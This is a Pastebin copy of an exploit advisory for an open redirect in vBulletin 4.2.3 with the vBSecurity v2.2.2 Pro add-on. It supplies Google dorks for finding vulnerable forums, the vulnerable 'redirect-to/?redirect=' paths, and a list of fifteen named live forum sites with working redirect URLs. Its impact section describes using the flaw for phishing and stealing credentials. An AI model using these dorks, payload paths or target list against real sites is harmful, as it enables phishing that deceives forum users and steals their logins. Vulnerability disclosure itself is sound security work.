Advertisement
KingSkrupellos

vBulletin 4.2.3 vBSecurity v2.2.2 Pro Open Redirection

Mar 1st, 2019
97
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.44 KB | None | 0 0
  1. ####################################################################
  2.  
  3. # Exploit Title : vBulletin 4.2.3 vBSecurity v2.2.2 Pro Open Redirection
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 01/03/2019
  7. # Vendor Homepage : vbulletin.com ~ dragonbyte-tech.com
  8. # Software Information Link : dragonbyte-tech.com/store/vbsecurity.123/
  9. # Software Affected Version : 2.2.2 Pro
  10. Compatible with vBulletin 3.8.x - vBulletin 4.x.x
  11. # Tested On : Windows and Linux
  12. # Category : WebApps
  13. # Exploit Risk : Medium
  14. # Google Dorks : intext:''vBulletin Security provided by vBSecurity v2.2.2 (Pro)''
  15. intext:Powered by vBulletin® Version 4.2.3
  16. intext:Extra Tabs by vBulletin Hispano
  17. intext:vBulletin Mods & Addons Copyright © 2019 DragonByte Technologies Ltd.
  18. # Vulnerability Type : CWE-601 [ URL Redirection to Untrusted Site ('Open Redirect') ]
  19. # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
  20. # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
  21. # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
  22.  
  23. ####################################################################
  24.  
  25. # Description about Software :
  26. ***************************
  27. vBSecurity keeps a watchful eye over your forum even when you
  28.  
  29. are not there, and has the capability to alert you of any suspicious activity.
  30.  
  31. ####################################################################
  32.  
  33. # Impact :
  34. *********
  35. This web application vBulletin 4.2.3 vBSecurity v2.2.2 Pro accepts a user-controlled
  36.  
  37. input that specifies a link to an external site, and uses that link in a Redirect.
  38.  
  39. This simplifies phishing attacks. An http parameter may contain a URL value and could cause
  40.  
  41. the web application to redirect the request to the specified URL. By modifying the URL value
  42.  
  43. to a malicious site, an attacker may successfully launch a phishing scam and steal user credentials.
  44.  
  45. Because the server name in the modified link is identical to the original site, phishing attempts
  46.  
  47. have a more trustworthy appearance.
  48.  
  49. Open redirect is a failure in that process that makes it possible for attackers to steer users to malicious websites.
  50.  
  51. This vulnerability is used in phishing attacks to get users to visit malicious sites without realizing it.
  52.  
  53. Web users often encounter redirection when they visit the Web site of a company whose name
  54.  
  55. has been changed or which has been acquired by another company. Visiting unreal web page
  56.  
  57. user's computer becomes affected by malware the task of which is to deceive the valid actor and steal his personal data.
  58.  
  59. ####################################################################
  60.  
  61. # Open Redirection Exploit :
  62. *************************
  63. /vbulletin/redirect-to/?redirect=[OPEN REDIRECTION VULNERABILITY]
  64.  
  65. /vBulletin/redirect-to/?redirect=[OPEN REDIRECTION VULNERABILITY]
  66.  
  67. /forum/redirect-to/?redirect=[OPEN REDIRECTION VULNERABILITY]
  68.  
  69. /forums/redirect-to/?redirect=[OPEN REDIRECTION VULNERABILITY]
  70.  
  71. /redirect-to/?redirect=[OPEN REDIRECTION VULNERABILITY]
  72.  
  73. ####################################################################
  74.  
  75. # Example Vulnerable Sites :
  76. *************************
  77. [+] subaruforester.org/vbulletin/redirect-to/?redirect=https://cxsecurity.com
  78.  
  79. [+] workingdogforum.com/vBulletin/redirect-to/?redirect=https://cxsecurity.com
  80.  
  81. [+] acura-legend.com/vbulletin/redirect-to/?redirect=https://cxsecurity.com
  82.  
  83. [+] hondatwins.net/forums/redirect-to/?redirect=https://cxsecurity.com
  84.  
  85. [+] diymobileaudio.com/forum/redirect-to/?redirect=https://cxsecurity.com
  86.  
  87. [+] xcrforum.com/forum/redirect-to/?redirect=https://cxsecurity.com
  88.  
  89. [+] cx500forum.com/forum/redirect-to/?redirect=https://cxsecurity.com
  90.  
  91. [+] rangerovers.net/forum/redirect-to/?redirect=https://cxsecurity.com
  92.  
  93. [+] m5board.com/vbulletin/redirect-to/?redirect=https://cxsecurity.com
  94.  
  95. [+] watchuseek.com/forums/redirect-to/?redirect=https://cxsecurity.com
  96.  
  97. [+] thetruthaboutcars.com/forum/redirect-to/?redirect=https://cxsecurity.com
  98.  
  99. [+] nookboards.com/forum/redirect-to/?redirect=https://cxsecurity.com
  100.  
  101. [+] a-classforum.com/forum/redirect-to/?redirect=https://cxsecurity.com
  102.  
  103. [+] wranglerforum.com/redirect-to/?redirect=https://cxsecurity.com
  104.  
  105. [+] techsupportforum.com/forums/redirect-to/?redirect=https://cxsecurity.com
  106.  
  107. ####################################################################
  108.  
  109. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  110.  
  111. ####################################################################
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement